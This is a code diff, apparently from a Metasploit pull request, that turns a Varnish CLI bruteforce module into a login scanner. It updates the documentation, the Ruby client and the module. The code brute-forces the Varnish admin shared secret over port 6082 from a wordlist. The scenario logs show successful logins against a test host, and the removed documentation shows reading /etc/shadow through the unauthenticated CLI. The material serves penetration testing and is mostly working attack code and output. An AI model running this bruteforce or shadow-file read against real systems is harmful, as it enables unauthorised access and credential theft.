module ready

Author: h00die

documentation/modules/auxiliary/scanner/varnish/varnish_cli_bruteforce.md renamed to documentation/modules/auxiliary/scanner/varnish/varnish_cli_login.md

@@ -1,16 +1,17 @@
 ## Vulnerable Application
 
   Ubuntu 14.04 can `apt-get install varnish`.  At the time of writing that installed varnish-3.0.5 revision 1a89b1f.
+  Kali installed varnish-5.0.0 revision 99d036f
 
   Varnish installed and ran the cli on localhost.  First lets kill the service: `sudo service varnish stop`.  Now, there are two configurations we want to test:
-  
-  
-  1. `varnishd -T 0.0.0.0:6082` no authentication
-  2. `varnishd -T 0.0.0.0:6082 -S <file>` authentication based on shared secret file.  I made an easy test one `echo "secret" > secret`
+
+  1. No Authentication: `varnishd -T 0.0.0.0:6082`
+  2. Authentication (based on shared secret file): `varnishd -T 0.0.0.0:6082 -S <file>`.
+    1. I made an easy test one `echo "secret" > ~/secret`
 
 ## Exploitation Notes
 
-These notes were taken from the module, and can be used when developing a working remote exploit
+These notes were taken from the original module in EDB, and can be used when developing a working remote exploit
 
 ```
 - varnishd typically runs as root, forked as unpriv.
@@ -83,29 +84,51 @@ enum cli_status_e {
 
   1. Install the application
   2. Start msfconsole
-  3. Do: ```use auxiliary/scanner/varnish/varnish_cli_bruteforce```
+  3. Do: ```use auxiliary/scanner/varnish/varnish_cli_login```
   4. Do: ```run```
-  5. You should get to read the first line of the /etc/shadow file.
+  5. Find a valid login.
 
 ## Options
 
-  **FILE**
+  **PASS_FILE**
 
-  Which file to read the first line from.  The default is /etc/shadow.
+  File which contains the password list to use.
 
 ## Scenarios
 
   Running against Ubuntu 14.04 with varnish-3.0.5 revision 1a89b1f and NO AUTHENTICATION
 
   ```
-    msf auxiliary(varnish_cli_bruteforce) > use auxiliary/scanner/varnish/varnish_cli_bruteforce
-    msf auxiliary(varnish_cli_bruteforce) > set verbose true
+    resource (varnish.rc)> use auxiliary/scanner/varnish/varnish_cli_login
+    resource (varnish.rc)> set pass_file /root/varnish.list
+    pass_file => /root/varnish.list
+    resource (varnish.rc)> set rhosts 192.168.2.85
+    rhosts => 192.168.2.85
+    resource (varnish.rc)> set verbose true
     verbose => true
-    msf auxiliary(varnish_cli_bruteforce) > run
-    
-    [+] 192.168.2.85:6082     - Varnishd CLI does not require authentication!
-    [+] 192.168.2.85:6082     - First line of /etc/shadow: root:!:17123:0:99999:7::::
+    resource (varnish.rc)> run
+    [+] 192.168.2.85:6082     - 192.168.2.85:6082 - LOGIN SUCCESSFUL: No Authentication Required
     [*] Scanned 1 of 1 hosts (100% complete)
     [*] Auxiliary module execution completed
+    msf auxiliary(varnish_cli_login) > 
+    ```
 
-  ```
+  Running against Ubuntu 14.04 with varnish-3.0.5 revision 1a89b1f
+
+  ```
+    resource (varnish.rc)> use auxiliary/scanner/varnish/varnish_cli_login
+    resource (varnish.rc)> set pass_file /root/varnish.list
+    pass_file => /root/varnish.list
+    resource (varnish.rc)> set rhosts 192.168.2.85
+    rhosts => 192.168.2.85
+    resource (varnish.rc)> set verbose true
+    verbose => true
+    resource (varnish.rc)> run
+    [*] 192.168.2.85:6082     - 192.168.2.85:6082 - Authentication Required
+    [!] 192.168.2.85:6082     - No active DB -- Credential data will not be saved!
+    [*] 192.168.2.85:6082     - 192.168.2.85:6082 - LOGIN FAILED: bad
+    [*] 192.168.2.85:6082     - 192.168.2.85:6082 - LOGIN FAILED: good
+    [+] 192.168.2.85:6082     - 192.168.2.85:6082 - LOGIN SUCCESSFUL: secret
+    [*] Scanned 1 of 1 hosts (100% complete)
+    [*] Auxiliary module execution completed
+  ```

lib/metasploit/framework/varnish/client.rb

@@ -12,8 +12,13 @@ module Client
 
         def require_auth?
           # function returns false if no auth is required, else the challenge string
-          sock.put("auth #{Rex::Text.rand_text_alphanumeric(64)}\n") # Cause a login fail to get the challenge. Length is correct, but this has upper chars, subtle diff
-          res = sock.get_once(-1,3) # grab challenge
+          res = sock.get_once # varnish can give the challenge on connect, so check if we have it already
+          if res && res =~ @@AUTH_REQUIRED_REGEX
+            return $1
+          end
+          # Cause a login fail to get the challenge. Length is correct, but this has upper chars, subtle diff for debugging
+          sock.put("auth #{Rex::Text.rand_text_alphanumeric(64)}\n")
+          res = sock.get_once # grab challenge
           if res && res =~ @@AUTH_REQUIRED_REGEX
             return $1
           end
@@ -27,11 +32,10 @@ def login(pass)
             if !!challenge
               response = Digest::SHA256.hexdigest("#{challenge}\n#{pass.strip}\n#{challenge}\n")
               sock.put("auth #{response}\n")
-              res = sock.get_once(-1,3)
+              res = sock.get_once
               if res && res =~ @@AUTH_SUCCESS_REGEX
                 return true
               else
-                raise RuntimeError, "|||#{challenge}|||#{pass.strip}|||#{response}"
                 return false
               end
             else

modules/auxiliary/scanner/varnish/varnish_cli_login.rb

@@ -1,5 +1,5 @@
 ##
-# This module requires Metasploit: http//metasploit.com/download
+# This module requires Metasploit: http://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
@@ -13,6 +13,7 @@ class MetasploitModule < Msf::Auxiliary
   include Msf::Exploit::Remote::Tcp
   include Msf::Auxiliary::Report
   include Msf::Auxiliary::Scanner
+  include Metasploit::Framework::Varnish::Client
 
   def initialize
     super(
@@ -37,38 +38,37 @@ def initialize
     register_options(
       [
         Opt::RPORT(6082),
-        OptPath.new('PASS_FILE',  [ false, 'File containing passwords, one per line',
+        OptPath.new('PASS_FILE',  [ true, 'File containing passwords, one per line',
           File.join(Msf::Config.data_directory, 'wordlists', 'unix_passwords.txt') ])
       ], self.class)
 
-    # no username, only a shared key aka password
-    #deregister_options('USERNAME', 'USER_FILE', 'USERPASS_FILE', 'USER_AS_PASS', 'DB_ALL_CREDS', 'DB_ALL_USERS')
-
     # We don't currently support an auth mechanism that uses usernames, so we'll ignore any
     # usernames that are passed in.
     @strip_usernames = true
   end
 
-  def setup
-    super
-    # They must select at least blank passwords, provide a pass file or a password
-    one_required = %w(BLANK_PASSWORDS PASS_FILE PASSWORD)
-    unless one_required.any? { |o| datastore.has_key?(o) && datastore[o] }
-      fail_with(Failure::BadConfig, "Invalid options: One of #{one_required.join(', ')} must be set")
-    end
-    if !datastore['PASS_FILE']
-      if !datastore['BLANK_PASSWORDS'] && datastore['PASSWORD'].blank?
-        fail_with(Failure::BadConfig, "PASSWORD or PASS_FILE must be set to a non-empty string if not BLANK_PASSWORDS")
+  def run_host(ip)
+    # first check if we even need auth
+    begin
+      connect
+      if !require_auth?
+        print_good "#{ip}:#{rport} - LOGIN SUCCESSFUL: No Authentication Required"
+        close_session
+        disconnect
+        return
+      else
+        vprint_status "#{ip}:#{rport} - Authentication Required"
       end
+      close_session
+      disconnect
+    rescue Rex::ConnectionError, EOFError, Timeout::Error
+      print_error "#{ip}:#{rport} - Unable to connect"
     end
-  end
 
-  def run_host(ip)
     cred_collection = Metasploit::Framework::CredentialCollection.new(
       pass_file: datastore['PASS_FILE'],
       username: '<BLANK>'
     )
-    vprint_status('made cred collector')
     scanner = Metasploit::Framework::LoginScanner::VarnishCLI.new(
       host: ip,
       port: rport,
@@ -79,7 +79,6 @@ def run_host(ip)
       framework_module: self,
 
     )
-    vprint_status('made scanner')
     scanner.scan! do |result|
       credential_data = result.to_h
       credential_data.merge!(
@@ -94,7 +93,7 @@ def run_host(ip)
         print_good "#{ip}:#{rport} - LOGIN SUCCESSFUL: #{result.credential.private}"
       else
         invalidate_login(credential_data)
-        vprint_status "#{ip}:#{rport} - LOGIN FAILED: #{result.credential.private} (#{result.status})"
+        vprint_status "#{ip}:#{rport} - LOGIN FAILED: #{result.credential.private}"
       end
     end
   end